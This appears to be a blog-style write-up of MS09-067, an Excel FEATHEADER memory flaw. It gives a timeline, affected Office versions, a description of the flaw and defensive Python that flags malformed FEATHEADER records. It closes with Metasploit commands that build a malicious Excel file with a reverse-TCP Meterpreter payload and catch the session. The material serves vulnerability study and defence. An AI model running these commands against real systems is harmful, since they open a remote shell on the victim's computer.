MS09-067 : Microsoft Excel Malformed FEATHEADER Record Vulnerability

Timeline :

Vulnerability reported to Microsoft by ZDI on 2009-10-20
Microsoft patch “KB973475” provided on 2009-11-10
Metasploit PoC provided by hdm on 2010-02-12
Exploit-DB PoC provided by anonymous on 2010-08-21

PoC provided by :

Sean Larsson

Affected version(s) :

Microsoft Office XP Service Pack 3
Microsoft Office 2003 Service Pack 3
2007 Microsoft Office System SP1 & SP2
Microsoft Office 2004 for Mac
Microsoft Office 2008 for Mac
Microsoft Office Excel Viewer SP1 & SP2
Microsoft Office Excel Viewer 2003 SP3

Tested on Windows XP SP3 with :

Office Excel 2003 SP3 before KB973475

Description :

This module exploits a vulnerability in the handling of the FEATHEADER record by Microsoft Excel. Revisions of Office XP and later prior to the release of the MS09-067 bulletin are vulnerable. When processing a FEATHEADER (Shared Feature) record, Microsoft used a data structure from the file to calculate a pointer offset without doing proper validation. Attacker-supplied data is then used to calculate the location of an object, and in turn a virtual function call. This results in arbitrary code execution. NOTE: On some versions of Office, the user will need to dismiss a warning dialog prior to the payload executing.
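As an added example (not part of the original post or of the Metasploit module), here is a defender-side triage check for the record the description names: it walks the BIFF records of an already-extracted Workbook stream and reports FEATHEADER records that deviate from the documented FeatHdr layout. The record type 0x0867 and the field layout are assumptions taken from Microsoft's published [MS-XLS] format documentation, the helper names and sample stream are constructed, and since the page does not say which field the exploit abuses, a hit is a triage signal only.

```python
import struct

FEATHDR = 0x0867                    # BIFF8 record type for FEATHEADER (assumed from [MS-XLS])
VALID_ISF = {2, 3, 4, 5}            # SharedFeatureType values listed in [MS-XLS]
FIXED_LEN = 12 + 2 + 1 + 4          # FrtHeader + isf + reserved + cbHdrData

def biff_records(stream):
    """Yield (offset, type, payload) per record; payload is None if truncated."""
    pos = 0
    while pos + 4 <= len(stream):
        rtype, size = struct.unpack_from("<HH", stream, pos)
        payload = stream[pos + 4:pos + 4 + size]
        if len(payload) < size:     # length field runs past the end of the stream
            yield pos, rtype, None
            return
        yield pos, rtype, payload
        pos += 4 + size

def check_featheader(stream):
    """Return [(offset, reason)] for FEATHEADER records that break the layout."""
    findings = []
    for off, rtype, payload in biff_records(stream):
        if payload is None:
            findings.append((off, "truncated record"))
        elif rtype == FEATHDR and len(payload) < FIXED_LEN:
            findings.append((off, "FEATHEADER shorter than its fixed fields"))
        elif rtype == FEATHDR:
            # isf (2 bytes), reserved (1 byte, skipped), cbHdrData (4 bytes)
            isf, cb_hdr = struct.unpack_from("<HxI", payload, 12)
            if isf not in VALID_ISF:
                findings.append((off, "unknown shared feature type"))
            if cb_hdr not in (0, 0xFFFFFFFF):
                findings.append((off, "cbHdrData is not 0 or 0xFFFFFFFF"))
            elif (cb_hdr == 0xFFFFFFFF) != (len(payload) > FIXED_LEN):
                findings.append((off, "cbHdrData disagrees with record length"))
    return findings

# Constructed sample stream (not taken from a real document): BOF, a
# well-formed FEATHEADER, one with an out-of-spec cbHdrData, then EOF.
def make_record(rtype, payload=b""):
    return struct.pack("<HH", rtype, len(payload)) + payload

def make_feathdr(isf, cb_hdr, hdr_data=b""):
    frt = struct.pack("<HH8x", FEATHDR, 0)
    return make_record(FEATHDR, frt + struct.pack("<HBI", isf, 1, cb_hdr) + hdr_data)

SAMPLE = (make_record(0x0809, bytes(16)) + make_feathdr(2, 0xFFFFFFFF, bytes(4))
          + make_feathdr(2, 0x1234) + make_record(0x000A))
```

The input is the raw Workbook stream, so the OLE2 container has to be unpacked first with a compound-file reader.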

Commands :

use exploit/windows/fileformat/ms09_067_excel_featheader
set OUTPUTPATH /home/eromang
set TARGET 2
set PAYLOAD windows/meterpreter/reverse_tcp

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
exploit -j

sessions -i 1